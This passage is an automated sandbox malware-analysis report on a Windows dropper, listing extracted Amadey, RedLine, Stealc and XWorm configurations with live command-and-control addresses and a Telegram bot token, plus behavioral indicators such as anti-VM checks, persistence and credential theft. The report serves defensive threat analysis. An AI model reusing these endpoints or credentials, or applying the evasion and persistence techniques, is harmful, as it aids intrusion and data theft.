Analysis
-
max time kernel
96s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-04-2024 23:21
Static task
static1
Behavioral task
behavioral1
Sample
654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
Resource
win11-20240426-en
General
-
Target
654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe
-
Size
1.8MB
-
MD5
7cc0b2f8e09e9e4718ec9b753d7c92b7
-
SHA1
7bb4b30ff33baa79cdbe2ef8e26a386281b3bce2
-
SHA256
654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591
-
SHA512
fad15d5727882b8e496642101d8e51782306eea29f224d485a2e4d4e11a9ab3894b32e1c57fb311a4efdaabc6bfa51c3a1d5bfb07f71d2abb54c8c2141cb2168
-
SSDEEP
49152:73/bn+KOPkicNihwbyRg3CGiDasCji8yi:7jn+9NmiYyRg3CGiD1Cji8
Malware Config
Extracted
amadey
4.20
http://193.233.132.139
-
install_dir
5454e6f062
-
install_file
explorta.exe
-
strings_key
c7a869c5ba1d72480093ec207994e2bf
-
url_paths
/sev56rkm/index.php
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
redline
Test1234
185.215.113.67:26260
Extracted
stealc
http://52.143.157.84
http://185.172.128.150
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
5.0
127.0.0.1:7000
91.92.252.220:7000
41.199.23.195:7000
saveclinetsforme68465454711991.publicvm.com:7000
bBT8anvIxhxDFmkf
-
Install_directory
%AppData%
-
install_file
explorer.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe family_xworm behavioral2/memory/5244-476-0x0000000000A30000-0x0000000000A42000-memory.dmp family_xworm -
Detect ZGRat V1 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2868-255-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1 C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_zgrat_v1 behavioral2/memory/2484-282-0x00000000001F0000-0x00000000002B0000-memory.dmp family_zgrat_v1 -
Glupteba payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/5680-907-0x0000000000400000-0x0000000001DFA000-memory.dmp family_glupteba behavioral2/memory/4796-946-0x0000000000400000-0x0000000001DFA000-memory.dmp family_glupteba behavioral2/memory/2128-1065-0x0000000000400000-0x0000000001DFA000-memory.dmp family_glupteba behavioral2/memory/5380-1066-0x0000000000400000-0x0000000001DFA000-memory.dmp family_glupteba behavioral2/memory/2128-1080-0x0000000000400000-0x0000000001DFA000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
9s3HoD6vGqGQPo6BT2pzsOGw.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 9s3HoD6vGqGQPo6BT2pzsOGw.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_redline behavioral2/memory/1864-277-0x0000000000A80000-0x0000000000AD2000-memory.dmp family_redline behavioral2/memory/2484-282-0x00000000001F0000-0x00000000002B0000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe family_redline behavioral2/memory/3684-360-0x0000000000020000-0x0000000000072000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
Processes:
9s3HoD6vGqGQPo6BT2pzsOGw.exe654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exeexplorta.exeamert.exe2c03579092.exechrosha.exeexplorta.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9s3HoD6vGqGQPo6BT2pzsOGw.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2c03579092.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exerundll32.exeflow pid process 61 5140 rundll32.exe 82 5848 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 4888 netsh.exe 3844 netsh.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
chrosha.exe654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exeamert.exeexplorta.exe9s3HoD6vGqGQPo6BT2pzsOGw.exeexplorta.exe2c03579092.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9s3HoD6vGqGQPo6BT2pzsOGw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2c03579092.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2c03579092.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9s3HoD6vGqGQPo6BT2pzsOGw.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe -
Executes dropped EXE 32 IoCs
Processes:
explorta.exeexplorta.exeamert.exe8a14325f02.exe2c03579092.exechrosha.exeexplorta.exeswiiiii.exealexxxxxxxx.exetrf.exekeks.exegold.exeNewB.exejok.exeswiiii.exefile300un.exemstc.exeloader.exexf34C1uoc4EnKcwdtLQTFQEf.exeVAd2LBJDml5xeUucS9EAra8f.exeopvxoSGfg9kPcG9AeGBMIMOM.exeu47o.0.exerun.exeu47o.3.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exeVAd2LBJDml5xeUucS9EAra8f.exeopvxoSGfg9kPcG9AeGBMIMOM.exe9s3HoD6vGqGQPo6BT2pzsOGw.exepid process 2492 explorta.exe 1592 explorta.exe 3684 amert.exe 2060 8a14325f02.exe 3020 2c03579092.exe 4956 chrosha.exe 2828 explorta.exe 2712 swiiiii.exe 4328 alexxxxxxxx.exe 2484 trf.exe 1864 keks.exe 328 gold.exe 2108 NewB.exe 3684 jok.exe 1524 swiiii.exe 3772 file300un.exe 5244 mstc.exe 5728 loader.exe 5460 xf34C1uoc4EnKcwdtLQTFQEf.exe 4796 VAd2LBJDml5xeUucS9EAra8f.exe 5680 opvxoSGfg9kPcG9AeGBMIMOM.exe 5740 u47o.0.exe 2348 run.exe 3636 u47o.3.exe 5980 0RVOkCttMp6duWJry0Gs9Wia.exe 5072 0RVOkCttMp6duWJry0Gs9Wia.exe 4216 0RVOkCttMp6duWJry0Gs9Wia.exe 5412 0RVOkCttMp6duWJry0Gs9Wia.exe 5144 0RVOkCttMp6duWJry0Gs9Wia.exe 2128 VAd2LBJDml5xeUucS9EAra8f.exe 5380 opvxoSGfg9kPcG9AeGBMIMOM.exe 2880 9s3HoD6vGqGQPo6BT2pzsOGw.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
chrosha.exeexplorta.exe654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exeexplorta.exeamert.exe2c03579092.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine chrosha.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine 2c03579092.exe -
Loads dropped DLL 9 IoCs
Processes:
rundll32.exerundll32.exerun.exerundll32.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exepid process 1852 rundll32.exe 5140 rundll32.exe 2348 run.exe 5848 rundll32.exe 5980 0RVOkCttMp6duWJry0Gs9Wia.exe 5072 0RVOkCttMp6duWJry0Gs9Wia.exe 4216 0RVOkCttMp6duWJry0Gs9Wia.exe 5412 0RVOkCttMp6duWJry0Gs9Wia.exe 5144 0RVOkCttMp6duWJry0Gs9Wia.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\9s3HoD6vGqGQPo6BT2pzsOGw.exe themida behavioral2/memory/2880-948-0x0000000140000000-0x0000000140749000-memory.dmp themida behavioral2/memory/2880-1067-0x0000000140000000-0x0000000140749000-memory.dmp themida -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
loader.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 loader.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 loader.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 loader.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
explorta.exemstc.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\8a14325f02.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\8a14325f02.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\2c03579092.exe = "C:\\Users\\Admin\\1000017002\\2c03579092.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "C:\\Users\\Admin\\AppData\\Roaming\\explorer.exe" mstc.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
9s3HoD6vGqGQPo6BT2pzsOGw.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9s3HoD6vGqGQPo6BT2pzsOGw.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
0RVOkCttMp6duWJry0Gs9Wia.exe0RVOkCttMp6duWJry0Gs9Wia.exedescription ioc process File opened (read-only) \??\D: 0RVOkCttMp6duWJry0Gs9Wia.exe File opened (read-only) \??\F: 0RVOkCttMp6duWJry0Gs9Wia.exe File opened (read-only) \??\D: 0RVOkCttMp6duWJry0Gs9Wia.exe File opened (read-only) \??\F: 0RVOkCttMp6duWJry0Gs9Wia.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ipinfo.io 38 api.myip.com 95 api.myip.com 98 ipinfo.io 14 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000016001\8a14325f02.exe autoit_exe -
Drops file in System32 directory 4 IoCs
Processes:
9s3HoD6vGqGQPo6BT2pzsOGw.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy 9s3HoD6vGqGQPo6BT2pzsOGw.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 9s3HoD6vGqGQPo6BT2pzsOGw.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 9s3HoD6vGqGQPo6BT2pzsOGw.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 9s3HoD6vGqGQPo6BT2pzsOGw.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeexplorta.exeexplorta.exeamert.exe2c03579092.exechrosha.exeexplorta.exe9s3HoD6vGqGQPo6BT2pzsOGw.exepid process 2184 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe 2492 explorta.exe 1592 explorta.exe 3684 amert.exe 3020 2c03579092.exe 4956 chrosha.exe 2828 explorta.exe 2880 9s3HoD6vGqGQPo6BT2pzsOGw.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
swiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exerun.exedescription pid process target process PID 2712 set thread context of 1020 2712 swiiiii.exe RegAsm.exe PID 4328 set thread context of 2868 4328 alexxxxxxxx.exe RegAsm.exe PID 328 set thread context of 4872 328 gold.exe RegAsm.exe PID 1524 set thread context of 3464 1524 swiiii.exe RegAsm.exe PID 3772 set thread context of 5856 3772 file300un.exe regsvcs.exe PID 2348 set thread context of 4204 2348 run.exe cmd.exe -
Drops file in Windows directory 2 IoCs
Processes:
654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exeamert.exedescription ioc process File created C:\Windows\Tasks\explorta.job 654114fbba05ee72867b0bc8ad925046cfbd9642c329a4e11035f534bacb3591.exe File created C:\Windows\Tasks\chrosha.job amert.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 1268 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4796 2712 WerFault.exe swiiiii.exe 1068 4328 WerFault.exe alexxxxxxxx.exe 1740 328 WerFault.exe gold.exe 3460 5460 WerFault.exe xf34C1uoc4EnKcwdtLQTFQEf.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
u47o.3.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u47o.3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u47o.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u47o.3.exe -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1744 schtasks.exe 2192 schtasks.exe 3552 schtasks.exe 2892 schtasks.exe 7144 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1116 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
VAd2LBJDml5xeUucS9EAra8f.exepowershell.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" VAd2LBJDml5xeUucS9EAra8f.exe Set value (str) 